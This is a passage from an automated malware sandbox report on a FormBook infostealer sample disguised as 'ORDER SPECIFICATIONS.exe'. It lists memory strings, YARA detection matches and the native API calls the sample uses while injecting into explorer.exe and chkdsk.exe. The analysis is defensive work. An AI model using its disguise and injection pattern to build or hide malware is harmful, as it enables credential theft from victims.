            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaYn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comoitu
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comon
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.come
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Micr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/dn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ico
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.233207946.00000000059FB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233044903.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.234237194.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krF
            Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comBR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233440991.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comtn
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233419468.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comxR
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://casarpontocom.zendesk.com/hc/pt-br
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://plus.google.com/
            Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
            Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: ORDER SPECIFICATIONS.exe, LogIn.csLong String: Length: 13656
            Source: LvZiFDk.exe.0.dr, LogIn.csLong String: Length: 13656
            Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.csLong String: Length: 13656
            Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.csLong String: Length: 13656
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: ORDER SPECIFICATIONS.exe
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_004181AB NtCreateFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041838A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015099A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015098F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015095D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015097A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015096E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015099D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015098A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509A10 NtQuerySection,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509560 NtWriteFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015095F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150A770 NtOpenThread,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509760 NtOpenProcess,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01509610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015096D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055895D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055899A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055896D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055896E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589560 NtWriteFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0558AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055899D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055895F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0558B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055898F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055898A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0558A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0558A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0558A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_055897A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05589A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB81B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB82E0 NtClose,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB8260 NtReadFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB8390 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB81AB NtCreateFile,
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00BB838A NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 0_2_07252FD0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 0_2_07250040
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 0_2_07252FC0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 0_2_07250D83
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00401030
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041BB65
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041CB93
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00408C50
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00408C0A
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041C42D
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041B496
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041C509
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041C515
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00402D8D
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00402D90
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0041BEFC
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_00402FB0
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CF900
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E4120
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01581002
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0159E824
